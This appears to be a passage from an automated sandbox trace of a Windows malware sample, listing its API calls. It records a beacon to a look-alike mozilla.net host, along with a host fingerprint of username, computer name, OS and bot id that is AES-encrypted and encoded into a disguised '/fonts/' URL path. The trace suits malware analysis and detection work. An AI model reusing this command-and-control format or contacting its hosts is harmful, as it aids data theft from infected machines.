| out: hHeap=0x2860000) returned 1 [0140.332] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0140.333] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0140.333] ResetEvent (hEvent=0x1c8) returned 1 [0140.333] InternetConnectA (hInternet=0xcc0004, lpszServerName="protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0140.334] SetEvent (hEvent=0x1c8) returned 1 [0140.334] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/GFNmN_2Fv/EB_2Ff35lBSV9ApL3S13/G00GZOEr8CgP4EwtbN3/s_2FJAPFrn1C7uk3Q35fZ2/_2FODD0k3TH2G/pFTCBH92/6Zd0bJIrfxiH2bAd1pV_2Fr/j6afvzbWx6/l7tnLZCrx8dQ3IDww/0UbTyP9r4mki/Ol7K6L7HIN1/nLwt_2BXIaWDA6/L0lmiYjVYupGvOAXZVLSR/tvhdghxhwrnXxzKs/mOPzS1IFDfKozh2/s5luF_2B9XJC17m8rz/dS5t8BRD5/NYmPJyeFBNTn_2BWZJqY/U4n0QAEAHOesDgNVXEI/8TzOIXbGz2uqAgrLT/r_2F.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0140.334] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0140.334] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0140.334] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0140.334] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0140.334] ResetEvent (hEvent=0x1c8) returned 1 [0140.334] ResetEvent (hEvent=0x38c) returned 1 [0140.334] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0140.334] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0140.334] GetLastError () returned 0x3e5 [0140.335] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x102 [0140.335] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0140.335] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0140.343] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x0 [0140.343] SetEvent (hEvent=0x1c8) returned 1 [0140.343] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x38c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0150.353] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) [0150.353] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0150.353] InternetCloseHandle (hInternet=0xcc000c) [0150.353] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0150.353] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0150.353] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0150.353] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0150.353] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0150.354] CloseHandle (hObject=0x1c8) returned 1 [0150.354] CloseHandle (hObject=0x38c) returned 1 [0150.355] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fbb0 | out: hHeap=0x2860000) returned 1 [0150.355] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0150.356] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0150.357] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0150.357] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f238 | out: hHeap=0x2860000) returned 1 [0150.357] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0150.358] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0150.358] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0150.358] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0150.358] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0160.370] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0160.370] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0160.371] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0160.371] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0160.371] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0160.371] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2831070400849) returned 1 [0160.372] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28310") returned 13 [0160.372] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0160.372] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0160.372] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0160.372] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0160.375] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0160.375] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0160.375] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0160.375] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0160.375] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0160.375] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0160.378] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0160.378] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0160.379] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0160.379] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0160.379] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0160.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRH2Ff35lBSV9ApL3S13/G00GZOErk", lpUsedDefaultChar=0x0) returned 20 [0160.379] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0160.380] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0160.380] lstrlenA (lpString="80.77.25.114") [0160.380] lstrlenA (lpString="80.77.25.114") returned 12 [0160.381] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd) returned 0x2c5ea50 [0160.381] memcpy (in: _Dst=0x2c5ea50, _Src=0x2c59ec9, _Size=0xc | out: _Dst=0x2c5ea50) returned 0x2c5ea50 [0160.381] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0160.381] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5f238 [0160.381] GetTickCount () returned 0x1ad05c9 [0160.381] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x6) returned 0x2c59a68 [0160.381] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5) returned 0x2c59a78 [0160.381] lstrlenA (lpString="%s=%s&") returned 6 [0160.381] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x10) returned 0x2c5ea68 [0160.381] sprintf (_Dest=0x2c5ea68, _Format="%s=%s&") [0160.381] sprintf (in: _Dest=0x2c5ea68, _Format="%s=%s&" | out: _Dest="itur=hcvba&") returned 11 [0160.381] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a78 | out: hHeap=0x2860000) returned 1 [0160.381] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0160.381] lstrlenA (lpString="itur=hcvba&") returned 11 [0160.381] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28310&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0160.382] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd1) returned 0x2c59b28 [0160.383] strcpy (_Dest=0x2c59b28, _Source="itur=hcvba&") [0160.383] strcpy (in: _Dest=0x2c59b28, _Source="itur=hcvba&" | out: _Dest="itur=hcvba&") returned="itur=hcvba&" [0160.383] lstrcatA (lpString1="itur=hcvba&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28310&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0160.383] lstrcatA (in: lpString1="itur=hcvba&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28310&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="itur=hcvba&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28310&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="itur=hcvba&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28310&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0160.383] lstrlenA (lpString="itur=hcvba&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28310&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 208 [0160.383] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0160.383] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0160.387] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0160.387] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0160.387] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d2f8) returned 1 [0160.387] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0160.387] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0160.387] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c08 [0160.387] memcpy (in: _Dst=0x2c59c08, _Src=0x2c59b28, _Size=0x10 | out: _Dst=0x2c59c08) returned 0x2c59c08 [0160.387] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.387] memcpy (in: _Dst=0x2c59c18, _Src=0x2c59b38, _Size=0x10 | out: _Dst=0x2c59c18) returned 0x2c59c18 [0160.387] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.387] memcpy (in: _Dst=0x2c59c28, _Src=0x2c59b48, _Size=0x10 | out: _Dst=0x2c59c28) returned 0x2c59c28 [0160.387] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x1 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0160.388] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x1, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0160.388] CryptDestroyKey (hKey=0x77d2f8) returned 1 [0160.388] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0160.388] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0160.388] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa40 [0160.389] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c08 | out: hHeap=0x2860000) returned 1 [0160.390] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0160.390] StrTrimA (psz="mHtZyjI0Iw6fkq0I08toJRZty2tDaiJ4jQnUzz6uR/afMnyZ6W1khq+QkGIs95Yx3tlmqphNUXfCVEuuOqWDRoZCpN3qvtcpxyYR1hCCCXBmH1v66jC6TNQC9YBa8IpMKH8VseiFufgFOR/EYq9kVgSqho66d/4ic45j9Hw5N7CxLjNXOEnaWyakOLN7W3NcEQJ4Kwt0zDjCUZG8sa/TT7PsDpO0cGcziK4nD3eZHnHw4T5zzRwOIiJDc8olgeEdux2SUumV3FIZUGyhb2+WCmQseCoK0QJ2dktFxdD2pcj=", pszTrimChars="\r\n=") [0160.390] StrTrimA (in: psz="mHtZyjI0Iw6fkq0I08toJRZty2tDaiJ4jQnUzz6uR/afMnyZ6W1khq+QkGIs95Yx3tlmqphNUXfCVEuuOqWDRoZCpN3qvtcpxyYR1hCCCXBmH1v66jC6TNQC9YBa8IpMKH8VseiFufgFOR/EYq9kVgSqho66d/4ic45j9Hw5N7CxLjNXOEnaWyakOLN7W3NcEQJ4Kwt0zDjCUZG8sa/TT7PsDpO0cGcziK4nD3eZHnHw4T5zzRwOIiJDc8olgeEdux2SUumV3FIZUGyhb2+WCmQseCoK0QJ2dktFxdD2pcj=", pszTrimChars="\r\n=" | out: psz="mHtZyjI0Iw6fkq0I08toJRZty2tDaiJ4jQnUzz6uR/afMnyZ6W1khq+QkGIs95Yx3tlmqphNUXfCVEuuOqWDRoZCpN3qvtcpxyYR1hCCCXBmH1v66jC6TNQC9YBa8IpMKH8VseiFufgFOR/EYq9kVgSqho66d/4ic45j9Hw5N7CxLjNXOEnaWyakOLN7W3NcEQJ4Kwt0zDjCUZG8sa/TT7PsDpO0cGcziK4nD3eZHnHw4T5zzRwOIiJDc8olgeEdux2SUumV3FIZUGyhb2+WCmQseCoK0QJ2dktFxdD2pcj") returned 1 [0160.390] lstrlenA (lpString="mHtZyjI0Iw6fkq0I08toJRZty2tDaiJ4jQnUzz6uR/afMnyZ6W1khq+QkGIs95Yx3tlmqphNUXfCVEuuOqWDRoZCpN3qvtcpxyYR1hCCCXBmH1v66jC6TNQC9YBa8IpMKH8VseiFufgFOR/EYq9kVgSqho66d/4ic45j9Hw5N7CxLjNXOEnaWyakOLN7W3NcEQJ4Kwt0zDjCUZG8sa/TT7PsDpO0cGcziK4nD3eZHnHw4T5zzRwOIiJDc8olgeEdux2SUumV3FIZUGyhb2+WCmQseCoK0QJ2dktFxdD2pcj") returned 299 [0160.390] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc08 [0160.390] _snprintf (_Dest=0x2c5fc31, _Count=0x4, _Format="%c%02X") [0160.390] _snprintf (in: _Dest=0x2c5fc31, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0160.390] _snprintf (in: _Dest=0x2c5fc40, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0160.390] _snprintf (in: _Dest=0x2c5fc9a, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0160.390] _snprintf (in: _Dest=0x2c5fcab, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0160.390] _snprintf (in: _Dest=0x2c5fce2, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0160.390] _snprintf (in: _Dest=0x2c5fd24, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0160.391] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0160.391] lstrlenA (lpString="mHtZyjI0Iw6fkq0I08toJRZty2tDaiJ4jQnUzz6uR_2FafMnyZ6W1khq_2BQkGIs95Yx3tlmqphNUXfCVEuuOqWDRoZCpN3qvtcpxyYR1hCCCXBmH1v66jC6TNQC9YBa8IpMKH8VseiFufgFOR_2FEYq9kVgSqho66d_2F4ic45j9Hw5N7CxLjNXOEnaWyakOLN7W3NcEQJ4Kwt0zDjCUZG8sa_2FTT7PsDpO0cGcziK4nD3eZHnHw4T5zzRwOIiJDc8olgeEdux2SUumV3FIZUGyhb2_2BWCmQseCoK0QJ2dktFxdD2pcj") returned 311 [0160.391] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15e) returned 0x2c5fa40 [0160.391] memcpy (in: _Dst=0x2c5fa40, _Src=0x2c5fc08, _Size=0x8 | out: _Dst=0x2c5fa40) returned 0x2c5fa40 [0160.391] memcpy (in: _Dst=0x2c5fa49, _Src=0x2c5fc10, _Size=0x17 | out: _Dst=0x2c5fa49) returned 0x2c5fa49 [0160.391] memcpy (in: _Dst=0x2c5fa61, _Src=0x2c5fc27, _Size=0xa | out: _Dst=0x2c5fa61) returned 0x2c5fa61 [0160.391] memcpy (in: _Dst=0x2c5fa6c, _Src=0x2c5fc31, _Size=0x11 | out: _Dst=0x2c5fa6c) returned 0x2c5fa6c [0160.391] memcpy (in: _Dst=0x2c5fa7e, _Src=0x2c5fc42, _Size=0xc | out: _Dst=0x2c5fa7e) returned 0x2c5fa7e [0160.391] memcpy (in: _Dst=0x2c5fa8b, _Src=0x2c5fc4e, _Size=0xb | out: _Dst=0x2c5fa8b) returned 0x2c5fa8b [0160.391] memcpy (in: _Dst=0x2c5fa97, _Src=0x2c5fc59, _Size=0xe | out: _Dst=0x2c5fa97) returned 0x2c5fa97 [0160.391] memcpy (in: _Dst=0x2c5faa6, _Src=0x2c5fc67, _Size=0x15 | out: _Dst=0x2c5faa6) returned 0x2c5faa6 [0160.391] memcpy (in: _Dst=0x2c5fabc, _Src=0x2c5fc7c, _Size=0x10 | out: _Dst=0x2c5fabc) returned 0x2c5fabc [0160.391] memcpy (in: _Dst=0x2c5facd, _Src=0x2c5fc8c, _Size=0xf | out: _Dst=0x2c5facd) returned 0x2c5facd [0160.391] memcpy (in: _Dst=0x2c5fadd, _Src=0x2c5fc9b, _Size=0x12 | out: _Dst=0x2c5fadd) returned 0x2c5fadd [0160.391] memcpy (in: _Dst=0x2c5faf0, _Src=0x2c5fcad, _Size=0x9 | out: _Dst=0x2c5faf0) returned 0x2c5faf0 [0160.391] memcpy (in: _Dst=0x2c5fafa, _Src=0x2c5fcb6, _Size=0x14 | out: _Dst=0x2c5fafa) returned 0x2c5fafa [0160.391] memcpy (in: _Dst=0x2c5fb0f, _Src=0x2c5fcca, _Size=0x13 | out: _Dst=0x2c5fb0f) returned 0x2c5fb0f [0160.391] memcpy (in: _Dst=0x2c5fb23, _Src=0x2c5fcdd, _Size=0x16 | out: _Dst=0x2c5fb23) returned 0x2c5fb23 [0160.391] memcpy (in: _Dst=0x2c5fb3a, _Src=0x2c5fcf3, _Size=0xd | out: _Dst=0x2c5fb3a) returned 0x2c5fb3a [0160.391] memcpy (in: _Dst=0x2c5fb48, _Src=0x2c5fd00, _Size=0x8 | out: _Dst=0x2c5fb48) returned 0x2c5fb48 [0160.391] memcpy (in: _Dst=0x2c5fb51, _Src=0x2c5fd08, _Size=0x17 | out: _Dst=0x2c5fb51) returned 0x2c5fb51 [0160.391] memcpy (in: _Dst=0x2c5fb69, _Src=0x2c5fd1f, _Size=0xa | out: _Dst=0x2c5fb69) returned 0x2c5fb69 [0160.392] memcpy (in: _Dst=0x2c5fb74, _Src=0x2c5fd29, _Size=0x11 | out: _Dst=0x2c5fb74) returned 0x2c5fb74 [0160.392] memcpy (in: _Dst=0x2c5fb86, _Src=0x2c5fd3a, _Size=0x6 | out: _Dst=0x2c5fb86) returned 0x2c5fb86 [0160.392] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc08 | out: hHeap=0x2860000) returned 1 [0160.392] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea68 | out: hHeap=0x2860000) returned 1 [0160.392] StrTrimA (in: psz="mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj", pszTrimChars="\r\n" | out: 